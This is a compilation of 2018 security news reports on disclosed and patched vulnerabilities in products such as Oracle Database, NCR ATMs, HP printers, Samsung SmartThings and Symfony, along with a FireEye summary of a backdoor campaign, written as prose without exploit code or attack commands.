The security hole, tracked as CVE-2018-3110 with a CVSS score of 9.9, affects Oracle Database 11.2.0.4 and 12.2.0.1 on Windows. Version 12.1.0.2 on Windows and Database running on Unix or Linux are also impacted, but patches for these versions were included in Oracle’s July 2018 CPU.

The vulnerability, present in the Java VM component of Oracle Database Server, can be exploited to take complete control of the product and obtain shell access to the underlying server.

However, the vendor noted that the weakness cannot be exploited remotely without authentication, and that the fix does not apply to client-only installations (i.e. installations that do not have Database Server).

“Easily exploitable vulnerability allows low privileged attacker having Create Session privilege with network access via Oracle Net to compromise Java VM. While the vulnerability is in Java VM, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Java VM,” Oracle said in its advisory.

The company “strongly recommends that customers take action without delay” to address CVE-2018-3110, which has led some to wonder if Oracle believes that the risk of exploitation is high.

Oracle patches critical Database flaw


Flaws in ATM Dispenser Controllers Allowed Hackers to Steal Cash
10.8.2018 securityweek
Vulnerebility

ATM hacking exploits cash dispenser controller vulnerabilities

Researchers have disclosed the details of two serious vulnerabilities affecting ATM currency dispensers made by NCR. The flaws have been patched, but they could have been exploited to install outdated firmware and get ATMs to dispense cash.

Positive Technologies experts Vladimir Kononovich and Alexey Stennikov have conducted a successful black box attack against the NCR S1 and S2 cash dispenser controllers. In these types of attacks, the attacker only sees inputs and outputs, without having any knowledge of the system’s internal workings.

The method, which the researchers described as a “logical attack,” requires physical access to the targeted device. In this particular case, an attacker could have leveraged the poor physical security of the targeted dispenser controller to connect to it, install vulnerable firmware, and issue commands that would instruct the machine to dispense cash.

The experts disclosed their findings this week at the Black Hat security conference in Las Vegas.

Two different security holes have been found that allow an attacker to roll back the firmware to an older, vulnerable version.

One of them is CVE-2017-17668, which affects the S1 controller, and the other is CVE-2018-5717, which affects the S2 controller.

The flaws are similar and they are both related to insufficient protection of the memory write mechanism. They can be exploited by an unauthenticated attacker to execute arbitrary code, bypass the firmware anti-rollback mechanism, and install firmware containing known vulnerabilities, according to Positive Technologies.

“Our research indicated that not all requests from the ATM computer to the dispenser were encrypted. Instead, encryption was applied only to requests deemed critical by the manufacturer, such as dispensing cash. But some of the so-called non-critical requests can be just as dangerous,” said Alexey Stennikov, Head of Hardware Security Analysis at Positive Technologies.

The researchers notified NCR of their findings and the vendor released critical firmware updates in February that should provide better protection against black box attacks. The update should address the firmware rollback vulnerability and it adds an extra layer of protection for physical authentication mechanisms.

“The physical authentication mechanism used to authorize encrypted communications to the dispenser has been strengthened to add protection against an attacker using endoscope technology in an attempt to manipulate dispenser electronics from outside the safe. Additionally, further authentication mechanisms have been added as configuration options,” NCR said in its advisory.


Security expert discovered a bug that affects million Kaspersky VPN users
10.8.2018 securityaffairs
Vulnerebility

A security issue exists in Kaspersky VPN <=v1.4.0.216 which leaks your DNS Address even after you’re connected to any virtual server. (Tested on Android 8.1.0)
What is a DNS leaks?

In this context, with the term “DNS leak” we indicate an unencrypted DNS query sent by your system OUTSIDE the established VPN tunnel.

Kaspersky VPN is one of the most trusted VPN which comes with 1,000,000+ tier downloads in the official Google Play Store, however, it was observed that when it connects to any random virtual server still leaks your actual DNS address.

The expert Dhiraj Mishra that discovered the flaw reported it to Kaspersky via Hackerone.

Mishra also published a step-by-step guide to reproduce the problem:

Visit IPleak (Note your actual DNS address).
Now, connect to any random virtual server using Kaspersky VPN.
Once you are successfully connected, navigate to IPleak you will observe that the DNS address still remains the same.
Kaspersky VPN

The expert explained that the data leak could threaten the privacy of end-users that want to remain anonymous on the internet.

“I believe this leaks the trace’s of an end user, who wants to remain anonymous on the internet. I reported this vulnerability on Apr 21st (4 months ago) via H1, and a fix was pushed for same but no bounty was awarded.” states Mishra.

The expert reported this vulnerability to Kaspersky on Apr 21st via HackerOne, and a fix was pushed for the issue.

Unfortunately, at the time, the researcher was awarded as expected under the company’s bug bounty.


Researchers Find Flaws in WPA2's 4-way Handshake Implementations
9.8.2018 securityweek
Vulnerebility

Researchers have discovered several security vulnerabilities in implementations of Wi-Fi Protected Access two (WPA2)’s 4-way handshake, which is used by nearly all protected Wi-Fi networks.

The discovery was the result of simulating cryptographic primitives during symbolic execution for the analysis of security protocol implementations, KU Leuven researchers Mathy Vanhoef and Frank Piessens explain in a recently published whitepaper (PDF).

By applying the technique on three client-side implementations of WPA2’s 4-way handshake, the researchers discovered timing side-channels when verifying authentication tags, a denial-of-service attack, a stack-based buffer overflow, and a non-trivial decryption oracle.

Through symbolic execution, the researchers claim, one aims to exhaustively explore all code paths of a program by running on symbolic inputs instead of concrete ones. For their experiments, the researchers implemented the techniques on top of the KLEE symbolic execution engine (they modified the engine to handle cryptographic primitives).

Of the three tested implementations, two were found susceptible to trivial timing side-channels, because they verify authentication tags using timing-unsafe memory compares.

The researchers found a denial of service in Intel’s iwd daemon (iNet wireless daemon) and a stack-based buffer overflow (in code that processes decrypted data) in MediaTek’s implementation, both of which can be triggered by malicious Access Point (AP). The AES unwrap algorithm was found to be incorrectly implemented in MediaTek’s code.

Furthermore, the wpa supplicant (a cross-platform supplicant with support for WEP, WPA and WPA2 (IEEE 802.11i)) was found vulnerable to a non-trivial decryption oracle caused by processing decrypted but unauthenticated data. Tracked as CVE-2018-14526, the bug can be exploited to recover sensitive information.

“This decryption oracle can be exploited when the victim connects to a WPA2 network using the old TKIP encryption algorithm. It can be abused to decrypt the group key transported in message 3 of the 4-way handshake,” the researchers note.

The attack, however, is only possible if WPA2 is used and if the client selects TKIP as the pairwise cipher, so that the RC4 stream cipher is used to encrypt the key data field (if CCMP is selected, AES is used to protect the key data field). Both conditions are met when the Wi-Fi network uses WPA2 and only supports TKIP (in 2016, 20% of protected Wi-Fi networks used this configuration).

The flaw allows an attacker to decrypt the group key transported in message 3 of WPA2’s 4-way handshake and use it to inject both broadcast and unicast traffic. Furthermore, the key could be used to decrypt unicast and broadcast traffic, the research paper claims.

“We successfully applied symbolic execution to client-side implementations of the 4-way handshake of WPA2, by simulating cryptographic primitives, and constraining parts of the symbolic input to prevent excessive state explosions. This revealed memory corruptions in code that processes decrypted data, uncovered insecure implementations of cryptographic primitives, and even revealed a decryption oracle,” the researchers note.

Earlier this week developers of the popular password cracking tool Hashcat identified a new method that can in some cases be used to obtain a network’s Wi-Fi Protected Access (WPA) or Wi-Fi Protected Access II (WPA2) password.


Flaws in Smart City Systems Can Allow Hackers to Cause Panic
9.8.2018 securityweek
Vulnerebility

Smart city - Credits: JCT 600 https://www.jct600.co.uk/blog/future-of-motoring/what-will-motoring-look-like-70-years-from-now/

Critical vulnerabilities discovered in smart city systems from several vendors can allow malicious actors to perform various actions that could lead to widespread panic, researchers warn.

The world’s major cities are increasingly reliant on smart technologies, including for traffic management, disaster detection and response, and remotely controlling utilities. These systems communicate via protocols such as 4G, ZigBee and Wi-Fi.

Following the recent accidental false missile alert in Hawaii, experts at Threatcare and IBM X-Force Red have decided to join forces and analyze smart city technologies to see if they are affected by any vulnerabilities that could be exploited to intentionally cause panic.

Researchers from the two companies analyzed products from Echelon, Libelium and Battelle. Their tests led to the discovery of 17 previously unknown vulnerabilities across four types of smart city products, including eight security holes described as “critical” and six as “high severity.”

In the case of Echelon, the companies tested i.LON 100 and 600 routers, which allow organizations to monitor and control LonWorks devices such as pumps, valves, motors, sensors and lights. They also analyzed the vendor’s SmartServer products, described as a “versatile controller, router, and smart energy manager that connects control devices to IP-based applications such as building automation, enterprise energy management, demand response programs, and high-value remote asset management programs.”

A total of five vulnerabilities were discovered in these systems, including two critical flaws that allow authentication bypass, default credentials, plaintext passwords, and the lack of encrypted communications. ICS-CERT recently published an advisory describing some of the issues identified by IBM and Threatcare.

In the case of Libelium, which specializes in hardware for wireless sensor networks, researchers analyzed Meshlium, an IoT gateway designed for connecting sensors to any cloud platform. Four distinct instances of a pre-authentication shell injection flaw were discovered in the product, and they have all been classified as “critical.”

As for Battelle, a global research and development organization, IBM and Threatcare analyzed two versions of its V2I (vehicle-to-infrastructure) Hub product, which is used for communicating data from traffic signal controllers to connected vehicles.

The list of vulnerabilities found in these systems include SQL injection, hardcoded passwords, unprotected sensitive functionality, cross-site scripting (XSS) flaws, and various API-related issues. A majority of these security holes have been assigned either a “critical” or “high severity” rating.

All the affected vendors have been notified and they have addressed the vulnerabilities.

Battelle has clarified that V2I Hub is a 2.5-year project that it’s working on for the Federal Highway Administration. The project is ongoing – it’s expected to be finished at the end of September – and it has only been deployed for testing purposes. Battelle told SecurityWeek that it fixed the flaws found by IBM in early July.

However, the discovery of these basic security holes shows that smart city systems are highly exposed to cyberattacks.

While there is no evidence of malicious attacks exploiting the vulnerabilities found as part of this research project, the companies warned that the risks are significant.

Worryingly, online searches conducted using Shodan and Censys showed that there are tens or hundreds of vulnerable systems accessible directly from the Internet. Some of them have been found to belong to a European country that uses vulnerable devices to detect radiation, and a major U.S. city that relies on them for traffic monitoring.

“According to our logical deductions, if someone, supervillain or not, were to abuse vulnerabilities like the ones we documented in smart city systems, the effects could range from inconvenient to catastrophic,” researchers said.

In a theoretical attack scenario described by the experts, an attacker exploits the vulnerabilities to manipulate data from water level sensors to indicate a flood, which could create panic. In addition, hackers could make the water level appear normal during a flood.

Hackers could also cause mass panic by manipulating data from radiation sensors in order to trigger radiation leak warnings.

Hijacking traffic systems can also have serious consequences. Attackers can cause chaos by controlling traffic signals, and create additional panic by setting off building and emergency alarms, and triggering gunshot sensors.


Flaw in BIND Security Feature Allows DoS Attacks
9.8.2018 securityweek
Vulnerebility

The Internet Systems Consortium (ISC) revealed on Wednesday that the BIND DNS software is affected by a serious vulnerability that can be exploited for denial-of-service (DoS) attacks.

The flaw, discovered by Tony Finch of the University of Cambridge and tracked as CVE-2018-5740, can be exploited remotely and it has been assigned a CVSS score of 7.5, which makes it “high severity.”

However, the vulnerability only impacts servers on which a feature called “deny-answer-aliases” has been enabled. The feature is disabled by default.

The “deny-answer-aliases” feature is designed to help recursive server operators protect users against DNS rebinding attacks. These types of attacks allow a remote hacker to abuse the targeted user’s web browser to directly communicate with devices on the local network and exploit any flaws they might have.

“Accidental or deliberate triggering of this defect will cause an INSIST assertion failure in named, causing the named process to stop execution and resulting in denial of service to clients,” ISC wrote in its advisory.

The security hole impacts BIND versions 9.7.0 through 9.8.8, 9.9.0 through 9.9.13, 9.10.0 through 9.10.8, 9.11.0 through 9.11.4, 9.12.0 through 9.12.2, and 9.13.0 through 9.13.2. A patch is included in versions 9.9.13-P1, 9.10.8-P1, 9.11.4-P1 and 9.12.2-P1. As a workaround, ISC suggests disabling the problematic feature if it has been used.

“Most operators will not need to make any changes unless they are using the ‘deny-answer-aliases’ feature. ‘deny-answer-aliases’ is off by default; only configurations which explicitly enable it can be affected by this defect,” ISC said.

The organization says it’s not aware of any instances where this vulnerability has been exploited for malicious purposes. Potentially affected users were notified of the flaw in advance, on July 31.


Researchers Find Flaw in WhatsApp
8.8.2018 securityweek
Vulnerebility

Researchers at Israeli cybersecurity firm CheckPoint said Wednesday they had found a flaw in WhatsApp that could allow hackers to modify and send fake messages in the popular social messaging app.

CheckPoint said the vulnerability gives a hacker the possibility "to intercept and manipulate messages sent by those in a group or private conversation" as well as "create and spread misinformation".

The report of the flaw comes as the Facebook-owned is coming under increasing scrutiny as a means of spreading misinformation due to its popularity and convenience for forwarding messages to groups.

Last month, the app announced limits of forwarding messages following threats by the Indian government to take action after more than 20 people were butchered by crazed mobs after being accused of child kidnapping and other crimes in viral messages circulated wildly on WhatsApp.

WhatsApp said in a statement: "We carefully reviewed this issue and it's the equivalent of altering an email to make it look like something a person never wrote."

However, WhatsApps said: "This claim has nothing to do with the security of end-to-end encryption, which ensures only the sender and recipient can read messages sent on WhatsApp."

The app noted it recently placed a limit on forwarding content, added a label to forwarded messages, and made a series of changes to group chats in order to tackle the challenge of misinformation.

Founded in 2009 and purchased by Facebook in 2014, WhatsApp said that at the beginning of the year it had more than 1.5 billion users who exchanged 65 billion messages per day.


Serious OpenEMR Flaws Expose Medical Records
8.8.2018 securityweek
Vulnerebility

Researchers have discovered nearly two dozen vulnerabilities in the OpenEMR software, including critical flaws that can be exploited to gain unauthorized access to medical records.

OpenEMR is a highly popular open source management software for health records and medical practices. The free application offers a wide range of features and it can run on various operating systems, including Windows, Linux and macOS.

Researchers at Project Insecurity, which provides penetration testing, vulnerability assessment and other cybersecurity services, conducted a detailed analysis of the OpenEMR source code. The analysis was based on manual source code reviews and Burp tests, and it led to the discovery of 23 flaws.Serious flaws found in OpenEMR

Fifteen of the security holes have been rated “high severity.” These include an authentication bypass issue that allows an attacker to access the patient portal, SQL injection flaws, remote command execution bugs, and arbitrary file read/write issues.

The authentication bypass vulnerability can be exploited by an unauthenticated attacker by navigating to the patient registration page and then modifying the URL to access pages that would normally require authentication, including ones storing patient data.

Experts discovered a total of nine SQL injection vulnerabilities, including ones that provide access to databases storing sensitive information. Exploiting the SQL injection flaws requires authentication, but that can be achieved using the aforementioned security bypass.

Four remote command execution flaws have been identified by experts, but they all require authentication, including admin privileges in some cases.

Researchers also found vulnerabilities that can be exploited to upload, read or delete files on the system. Exploitation requires authentication, but their impact can be high.

According to Project Insecurity, OpenEMR is affected by several cross-site request forgery (CSRF) vulnerabilities. In some cases, these flaws can be exploited to escalate privileges and execute arbitrary code if the attacker can convince an administrator to click on a malicious link.

The other vulnerabilities discovered by Project Insecurity include unrestricted file upload, information disclosure and other issues classified as medium or low severity.

Project Insecurity has published a 28-page report detailing each of the flaws, including impact, cause, and proof-of-concept (PoC) code. The report also shares recommendations on how the security holes can be addressed.

The vulnerabilities were reported to OpenEMR developers on July 7 and patches were rolled out for all the bugs within roughly two weeks.


HP releases firmware updates for two critical RCE flaws in Inkjet Printers
7.8.2018 securityaffairs
Vulnerebility

HP has released firmware updates that address two critical remote code execution vulnerabilities in some models of inkjet printers.
HP has released firmware updates to address two critical RCE flaws affecting some Inkjet printers. The two flaws, tracked as CVE-2018-5924 and CVE-2018-5925, could be exploited by attackers to trigger stack or static buffer overflow.

An attacker can exploit the vulnerabilities by sending a specially crafted file to the vulnerable inkjet printers.

“Two security vulnerabilities have been identified with certain HP Inkjet printers. A maliciously crafted file sent to an affected device can cause a stack or static buffer overflow, which could allow remote code execution.” reads the security advisory published by HP.

The flaws have been assigned a CVSS score of 9.8 and affected roughly 160 models, including PageWide, DesignJet, Officejet, Deskjet, Envy, and Photosmart.

To download the firmware updates, go to the HP Software and Drivers page for your product and find the appropriate firmware update from the list of available software.
Go to the Upgrading Printer Firmware page and follow the instructions provided to install the firmware.

HP inkjet printers hacking

Flaws in the firmware of printers are not a novelty, in NNovember2017, experts from FoxGlove Security firm found a potentially serious remote code execution vulnerability in some of HP’s enterprise printers.

Recently HP launched a private bug bounty program that offers up to $10,000 to white hat hackers that will discover serious issues in its printers.


HP Patches Critical RCE Flaws in Inkjet Printers
6.8.2018 securityweek 
Vulnerebility

HP has released firmware updates for many of its ink printers to address a couple of critical vulnerabilities that can be exploited for remote code execution.

According to the HP Product Security Response Team (PSRT), the company’s Inkjet printers are affected by flaws that allow an attacker to trigger a stack or static buffer overflow and execute arbitrary code by sending a specially crafted file to an affected device.

The vulnerabilities are tracked as CVE-2018-5924 and CVE-2018-5925, and they have both been assigned a CVSS score of 9.8.

HP has shared a list of roughly 160 impacted products, including PageWide, DesignJet, Officejet, Deskjet, Envy and Photosmart devices. The firmware updates for each impacted product can be obtained from HP’s website.

This is not the first time a remote code execution flaw has been found in HP printers. Last year, researchers discovered several potentially serious vulnerabilities in some of HP’s enterprise printers, including an RCE bug affecting LaserJet Enterprise, PageWide Enterprise, LaserJet Managed and OfficeJet Enterprise printers.

HP recently announced the launch of a private bug bounty program that offers up to $10,000 for serious vulnerabilities found in the company’s printers. HP had invited 34 researchers by the time the initiative was unveiled.

The program covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).


Salesforce warns of API error that exposed Marketing data
5.8.2018 securityweek
Vulnerebility

The US Cloud-based customer relationship management software giant Salesforce is warning marketing customers of a data leakage caused by an API error.
The US cloud computing company Salesforce is warning marketing customers of a data leakage caused by an API error. The incident could potentially affect a large number of companies, including Aldo, Dunkin Donuts, GE, HauteLook, Nestle Waters, and Sony.

The error was in production between June 4 to July 18, and potentially affected users of two modules within the broader Marketing Cloud offering, the Email Studio and Predictive Intelligence solutions.

“On July 18, we became aware of an issue that impacted a subset of Marketing Cloud customers using Marketing Cloud Email Studio and Predictive Intelligence.” reads the notice published by Salesforce.

“We resolved the issue on that same day, July 18. Customers who may have been impacted were notified. For additional details, please see the Email Studio and Predictive Intelligence REST API Issue article here: https://sfdc.co/XIbG2”

salesforce marketing-cloud

The news was first reported by BankInfoSecurity that obtained a copy of the alert distributed by the company via email on Thursday.

Salesforce states that the error involved the company’s REST application programming interface.

“During a Marketing Cloud release between June 4, 2018, and July 7, a code change was introduced that, in rare cases, could have caused REST API calls to retrieve or write data from one customer’s account to another inadvertently,” reads the alert issued by Salesforce and published by BankInfoSecurity.

“Where the issue occurred, the API call may have failed and generated an error message rather than writing or modifying data.”

The company also warns that some customers may have had their data corrupted, it has also posted a knowledge article on the issue.

The bad news for the customers of the company. is that at the time it is not able to say if data was altered or is attackers maliciously tampered with.

“We have no evidence of malicious behavior associated with this issue,” a Salesforce spokesman told ISMG.

“We are unable to confirm if your data was viewed or modified by another customer,” Salesforce explained in its alert, noting that it was notifying all customers just to be on the safe side. “While Salesforce continues to conduct additional quality checks and testing in relation to this issue, we recommend that you monitor and review your data carefully to ensure the accuracy of your account.”


CVE-2018-14773 Symfony Flaw expose Drupal websites to hack
3.8.2018 securityaffairs 
Vulnerebility

A vulnerability in the Symfony HttpFoundation component tracked as CVE-2018-14773, could be exploited by attackers to take full control of the affected Drupal websites.
Maintainers at Drupal addressed the security bypass vulnerability by releasing a new version of the popular content management system, the version 8.5.6.

“The Drupal project uses the Symfony library. The Symfony library has released a security update that impacts Drupal. Refer to the Symfony security advisory for the issue. The same vulnerability also exists in the Zend Feed and Diactoros libraries included in Drupal core; however, Drupal core does not use the vulnerable functionality.” reads the advisory published by Drupal.

“If your site or module uses Zend Feed or Diactoros directly, read the Zend Framework security advisory and update or patch as needed.”

Symfony HttpFoundation component is a third-party library used in the Drupal Core, the flaw affects Drupal 8.x versions before 8.5.6.

Symfony is web application framework that is being used by a lot of projects, this means that the CVE-2018-14773 vulnerability could potentially affect a large number of web applications.

The flaw is due to the Symfony’s support for legacy and risky HTTP headers.

“Support for a (legacy) IIS header that lets users override the path in the request URL via the X-Original-URL or X-Rewrite-URL HTTP request header allows a user to access one URL but have Symfony return a different one which can bypass restrictions on higher level caches and web servers.” reads the security advisory published by Symfony.

“The fix drops support for these two obsolete IIS headers: X-Original-URL and X_REWRITE_URL.” reads the security advisory published Symfony.

A remote attack can trigger the flaw by using specially crafted ‘X-Original-URL’ or ‘X-Rewrite-URL’ HTTP header value.

According to the security advisory published by Symfony, the version 2.7.49, 2.8.44, 3.3.18, 3.4.14, 4.0.14, and 4.1.3 addressed the flaw.

CVE-2018-14773

The Drupal maintainers also found a similar issue affecting the Zend Feed and Diactoros libraries used in the Drupal Core. The libraries are affected by an ‘URL Rewrite vulnerability,’ anyway the Drupal team confirmed that the Drupal Core does not use the vulnerable functionality.

Administrators of websites that use Zend Feed or Diactoros directly need to patch them as soon as possible.

Drupal administrators need to patch their installs urgently before hackers will start exploiting the CVE-2018-14773 flaw.


HP Launches Bug Bounty Program for Printers
1.8.2018 securityweek  
Vulnerebility

HP announced on Tuesday the launch of a bug bounty program for printers. The company is prepared to pay out up to $10,000 for serious vulnerabilities found in its products.

The initiative, which HP calls the industry’s first printer bug bounty program, was launched in partnership with crowdsourced security platform Bugcrowd.HP launches printer bug bounty program

The program is private, which means not anyone can participate. Researchers invited by HP have been instructed to focus on firmware-level vulnerabilities, including remote code execution, cross-site request forgery (CSRF) and cross-site scripting (XSS) bugs.

The rewards range between $500 and $10,000 per flaw, but HP is not disclosing the specific payouts for each type of issue. Researchers can also earn a reward if they report a vulnerability previously discovered by HP itself – the company describes this as a “good faith payment.”

The bug bounty program currently covers HP LaserJet Enterprise printers and MFPs (A3 and A4), as well as the HP PageWide Enterprise printers and MFPs (A3 and A4).

HP told SecurityWeek that currently it’s engaged with 34 researchers. The company says the program covers only endpoint devices – printer-related web domains are out of scope – with a focus on print firmware.

The company plans on expanding the program to its PC line soon, but it currently focuses on printers due to concerns that the technological advancements in this area make these types of devices an attractive target for malicious actors. HP noted that printers can not only provide access to the network that houses them, but they can also expose confidential documents.

“As we navigate an increasingly complex world of cyber threats, it’s paramount that industry leaders leverage every resource possible to deliver trusted, resilient security from the firmware up,” said Shivaun Albright, HP's Chief Technologist of Print Security. “HP is committed to engineering the most secure printers in the world.”


Samsung Patches Critical Vulnerabilities in SmartThings Hub

31.7.2018 securityweek Vulnerebility

Samsung has patched a series of critical vulnerabilities in its SmartThings Hub, which could be exploited to execute OS commands or other arbitrary code on vulnerable devices.

Designed as a central controller, the SmartThings Hub allows users monitor and manage smart home devices such as smart plugs, LED light bulbs, thermostats, cameras, and more. The controller runs a Linux-based firmware that allows for communications with Internet of Things devices deployed in the home using Ethernet, Zigbee, Z-Wave and Bluetooth.

An attacker able to leverage the discovered vulnerabilities could access sensitive information gathered by the connected devices, monitor and control devices within the home, and perform unauthorized activities. They could also unlock homes, monitor users via cameras inside homes, disable motion detectors, and even cause physical damage to appliances.

A total of 20 vulnerabilities impacting the SmartThings Hub were discovered by Talos researchers, who reveal that an attacker could “chain together three vulnerability classes that are present in the device to gain complete control of the device.” In a blog post, the researchers also describe different attack vectors an actor looking to exploit these vulnerability chains could use.

The vulnerabilities were found in Samsung SmartThings Hub STH-ETH-250 - Firmware version 0.20.17. Samsung has already released patches for all flaws and users are advised to update their devices to stay secure (because Samsung pushes the updates automatically and user interaction should not be necessary).


Office Vulnerabilities Chained to Deliver Backdoor
30.7.2018 securityweek
Vulnerebility  Virus

A recently observed malicious campaign is abusing two chained Office documents, each exploiting a different vulnerability, to deliver the FELIXROOT Backdoor, FireEye reports.

The attack starts with a lure RTF document claiming to contain seminar information on environmental protection. When opened, it attempts to exploit CVE-2017-0199 to download a second stage payload, which is a file weaponized with CVE-2017-11882 (the Equation Editor vulnerability).

Upon successful infection, the FELIXROOT loader component is dropped onto the victim’s machine, along with an LNK file that points to %system32%\rundll32.exe. The LNK file, which contains the command to execute the loader component of FELIXROOT, is moved to the startup directory.

The embedded backdoor component, which is encrypted using custom encryption, is decrypted and loaded directly in memory. The malware has a single exported function.

Upon execution, the backdoor sleeps for 10 minutes, then it checks to see if it was launched by RUNDLL32.exe along with parameter #1. If so, it performs an initial system triage before launching command and control (C&C) network communications.

In addition to gathering a variety of system information, the malware also reads registry entries for potential administration escalation and proxy information.

Based on received commands, the backdoor can fingerprint the infected machine, drop a file and execute it, launch remote shell, terminate connection to the C&C, download and run batch script, download file, and upload file.

Communication with the C&C server is performed over HTTP and HTTPS. Sent data is encrypted using AES encryption and arranged in a custom structure.

The malware contains several commands for specific tasks. Once it has executed all tasks, it clears all the footprints from the targeted machine, by deleting the LNK file, created registry keys, and the dropper components.

“CVE-2017-0199 and CVE-2017-11882 are two of the more commonly exploited vulnerabilities that we are currently seeing. Threat actors will increasingly leverage these vulnerabilities in their attacks until they are no longer finding success, so organizations must ensure they are protected,” FireEye notes.


Tens of flaws in Samsung SmartThings Hub expose smart home to attack
30.7.2018 securityaffairs
Vulnerebility  IoT

Cisco Talos researchers found tens of flaws in Samsung SmartThings Hub controller that potentially expose smart home devices to attack
Cisco Talos researchers have discovered 20 vulnerabilities in Samsung SmartThings Hub controller that potentially expose any supported third-party smart home devices to cyber attack.

“Cisco Talos recently discovered several vulnerabilities present within the firmware of the Samsung SmartThings Hub.” reads the analysis published by Talos.

“These vulnerabilities could allow an attacker to execute OS commands or other arbitrary code on affected devices.”

The Samsung SmartThings Hub is a central controller that could be used to manage a broad range of internet-of-things (IoT) devices in a smart home, including smart plugs, LED light bulbs, thermostats, and cameras.

The access to those IoT devices could allow attackers to gather sensitive information managed by the devices within the home and perform unauthorized activities.

Samsung SmartThings Hub runs a Linux-based firmware and allows for communications with various IoT devices using various wireless standards Zigbee, Z-Wave, and Bluetooth.

Talos researchers explained that in order to exploit the flaws, the attacker needs to chain a number of existing vulnerabilities together.

“It is possible to gather the set of preconditions needed to exploit bugs that would otherwise be unreachable by using multiple vulnerabilities.” researchers said.

“This is commonly referred to as “chaining.” When considering the severity of vulnerabilities, it is essential to keep in mind that they might be used as part of a chain, as this would significantly elevate their severity.”

The experts identified three notable chains, only one of them is a remote code execution (RCE) vulnerability that can be exploited without prior authentication.

RCE Chain – CVE-2018-3911

This RCE chain attack affects the “video core” HTTP server of the hub, it could be exploited by attackers to inject HTTP requests into this process from a network. The flaw is an exploitable HTTP header injection bug that exists within the communications (via Port 39500) between the hub and the remote servers. The flaw could be exploited by sending specially crafted HTTP requests to vulnerable devices.

“This vulnerability is present within the JSON processing performed by the `hubCore` binary present within the SmartThings hub and could be combined with other vulnerabilities present within affected devices to achieve code execution.” states the report.

Samsung SmartThings Hub

Other chains

Other chains identified by the researchers could be exploited only by an authenticated attacker.

The first attack chain is a remote code execution that could be obtained by exploiting the CVE-2018-3879 flaw that allows authorized attackers to execute SQL queries against a database running in the IoT device.

Experts noticed that chaining this flaw, with a string of other memory corruption vulnerabilities (CVE-2018-3880, CVE-2018-3906, CVE-2018-3912 to CVE-2018-3917, and CVE-2018-3919) that affects the Samsung SmartThings Hub it is possible to execute arbitrary code in the network.

Experts highlighted that the CVE-2018-3879 can also be exploited in the final chain attack for remote information leakage. This vulnerability can be used to create an empty file inside the device.

“Remote information leakage: TALOS-2018-0556 can also be used to create an empty file anywhere inside the device. As described in TALOS-2018-0593, the existence of an empty file at path “/hub/data/hubcore/stZigbee” will make the “hubCore” process to crash. Moreover, as described in TALOS-2018-0594, when the “hubCore” process crashes, it triggers an information leak that can be captured from the network.” reads the analysis tublished by Talos.

“By chaining these 3 vulnerabilities in order, an attacker can obtain a memory dump of the `hubCore` process, which contains most of the core logic, and consequent sensitive information, of the Hub.”

Talos experts tested and confirmed that the Samsung SmartThings Hub STH-ETH-250 – Firmware version 0.20.17 is affected by the flaws.

Samsung has addressed the flaw and security updates have been pushed out automatically.

“Talos recommends that these devices are updated as quickly as possible. As Samsung pushes updates out to devices automatically, this should not require manual intervention in most cases. It is important to verify the updated version has actually been applied to devices to ensure that they are no longer vulnerable. Samsung has released a firmware update that resolves these issues. An advisory related to these vulnerabilities can be found here.” concludes Talos.


Experts discovered a Kernel Level Privilege Escalation in Oracle Solaris
28.7.2018 securityaffairs
Vulnerebility

Security expert discovered Kernel Level Privilege Escalation vulnerability in the Availability Suite Service component of Oracle Solaris 10 and 11.3
Security researchers from Trustwave have discovered a new high severity vulnerability, tracked as CVE-2018-2892, that affected the Availability Suite Service component in Oracle Solaris 10 and 11.3.

The flaw could be exploited by a remote authenticated attacker to execute code with elevated privileges.

“A local kernel ring0 code execution vulnerability exists in the Oracle Solaris AVS kernel component permitting arbitrary code execution and thus privilege escalation.” reads the security advisory published by the company.

“The issue is the result of a signedness bug in the bounds checking of the ‘SDBC_TEST_INIT’ ioctl code sent to the ‘/dev/sdbc‘ device. The result is a call to copyin() with a user controllable destination pointer and length thereby facilitating an arbitrary kernel memory overwrite and thus arbitrary code execution in the context of the kernel.”

The experts discovered that the flaw was first discovered in 2007 and it was publicly disclosed in 2009 during the CanSecWest security conference.

The vulnerability is the result of a combination of several arbitrary memory dereference issued and an unbounded memory write vulnerability.

“The original issue was disclosed on stage at CanSec 2009 ( https://cansecwest.com/slides.html).” reads the analysis published by Trustwave. “The root cause of the issue is a combination of an arbitrary memory dereference through a lack of bounds checking on a user-controlled array index combined with an unbounded user-controllable length in the call to copyin(). The combined result is an arbitrary memory write and overflow in the call to copyin().”

oracle solaris

Oracle also rolled out a security patch after the issue was disclosed, but evidently the problem was not totally addressed.

“Exploitation of the issue is almost identical to the exploit developed back in 2007 for the original issue with the exception of a change in architecture between OpenSolaris running on x86 (32-bit) and the newer Oracle Solaris 11 running on x86-64 taking into account that the user-supplied index uap->ar must now be a negative value.” continues Trustwave.

According to the experts, the flaw is still present in the solution due to the introduction of additional code used for testing purposes.

Oracle addressed this flaw as a part of the July CPU security updates


NetSpectre is a remote Spectre attack that allows stealing data over the network
28.7.2018 securityaffairs
Vulnerebility

Researchers discovered a new variant of the Spectre attack, dubbed NetSpectre, that allows to steal data over the network from the target system.
A group of researchers has devised a new variant of the Spectre attack, dubbed NetSpectre, that could allow an attacker to steal data over the network from the target system.

NetSpectre is described as a remote side-channel attack that like the Spectre variant 1 (CVE-2017-5753) exploit a flaw in the speculative execution mechanism. The technique could bypass address-space layout randomization on the remote system and allow the attackers to execute code on the vulnerable system.

The original Spectre attack allows user-mode applications to extract information from other processes running on the same system. It can also be exploited to extract information from its own process via code, for example, a malicious JavaScript can be used to extract login cookies for other sites from the browser’s memory.

The Spectre attack breaks the isolation between different applications, allowing to leak information from the kernel to user programs, as well as from virtualization hypervisors to guest systems.

The researchers that discovered the NetSpectre attack explained that the technique leverages the AVX-based covert channel to capture data at a deficient speed of 60 bits per hour from the target system.

“we present NetSpectre, a generic remote Spectre variant 1 attack. ” reads the research paper.

“Beyond retrofitting existing attacks to a network scenario, we also demonstrate the first Spectre attack which does not use a cache covert channel. Instead, we present a novel high performance AVX-based covert channel that we use in our cachefree Spectre attack. We show that in particular remote Spectre attacks perform significantly better with the AVX-based covert channel, leaking 60 bits per hour from the target system”

An attacker could carry out the Netspectre attack to read arbitrary memory from the systems that have a network interface exposed on the network and that contain the required Spectre gadgets.

“As our NetSpectre attack is mounted over the network, the victim device requires a network interface an attacker can reach. The attacker must be able to send a large number of network packets to the victim,” continues the paper.

